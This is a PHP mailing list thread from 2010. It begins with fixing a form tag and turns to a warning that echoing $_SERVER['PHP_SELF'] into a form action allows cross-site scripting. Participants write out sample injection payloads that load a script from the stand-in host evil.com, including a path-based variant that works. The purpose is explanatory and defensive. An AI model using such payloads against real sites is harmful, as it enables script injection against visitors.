Op 3/10/10 11:39 PM, Daniel Egeberg schreef: > On Wed, Mar 10, 2010 at 23:44, Dmitry Ruban <dmitry@xxxxxxxxx> wrote: >> Hi Jochem, >> >> Jochem Maas wrote: >>> >>> Op 3/10/10 6:23 PM, Joseph Thayne schreef: >>>> >>>> Looks to me like you are closing your form before you put anything in >>>> it. Therefore, the loan_amount is not set making the value 0. Follow >>>> the math, and you are dividing by 1-1. >>>> >>>> Change this line: >>>> >>>> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"></form> >>>> >>>> to: >>>> >>>> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"> >>> >>> this is a XSS waiting to happen. I can put something like the following in >>> the request uri: >>> >>> index.php?" onsubmit="evil()"><script >>> src="http://www.evil.com/evi.js";></script> >>> >> Apparently it's not going to work. PHP_SELF does not include query string. >> So it is safe to use it this way. >> >> Regards, >> Dmitry > > No, it is not safe... > > This won't work: > index.php?" onsubmit="evil()"><script > src="http://www.evil.com/evi.js";></script> > > But this will: > index.php/" onsubmit="evil()"><script > src="http://www.evil.com/evi.js";></script> yeah sorry, I was lax and made the query string mistake, the issue stands though as Daniel pointed out. > -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
